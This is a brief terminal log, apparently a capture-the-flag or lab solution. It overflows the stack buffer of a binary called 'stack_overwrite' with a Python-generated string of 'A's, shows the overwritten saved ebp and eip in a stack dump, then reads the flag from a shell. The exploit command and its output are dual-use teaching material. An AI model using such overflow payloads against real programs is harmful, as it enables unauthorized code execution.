$ ./stack_overwrite `python -c "print 'A' * 80 + chr(1)"`
Stack dump:
0xfffc8ab8: 0x0000223d
0xfffc8ab4: 0xfffca7f2 (second argument)
0xfffc8ab0: 0x00000001 (first argument)
0xfffc8aac: 0x41414141 (saved eip)
0xfffc8aa8: 0x41414141 (saved ebp)
0xfffc8aa4: 0x41414141
0xfffc8aa0: 0x41414141
0xfffc8a9c: 0x41414141
0xfffc8a98: 0x41414141
0xfffc8a94: 0x41414141
0xfffc8a90: 0x41414141
0xfffc8a8c: 0x41414141
0xfffc8a88: 0x41414141
0xfffc8a84: 0x41414141
0xfffc8a80: 0x41414141
0xfffc8a7c: 0x41414141
0xfffc8a78: 0x41414141
0xfffc8a74: 0x41414141
0xfffc8a70: 0x41414141
0xfffc8a6c: 0x41414141
0xfffc8a68: 0x41414141
0xfffc8a64: 0x41414141
0xfffc8a60: 0x41414141 (beginning of buffer)
win = 1
sh-4.2$ cat key
this_is_why_i_store_everything_on_the_heap
sh-4.2$ 

Key: this_is_why_i_store_everything_on_the_heap
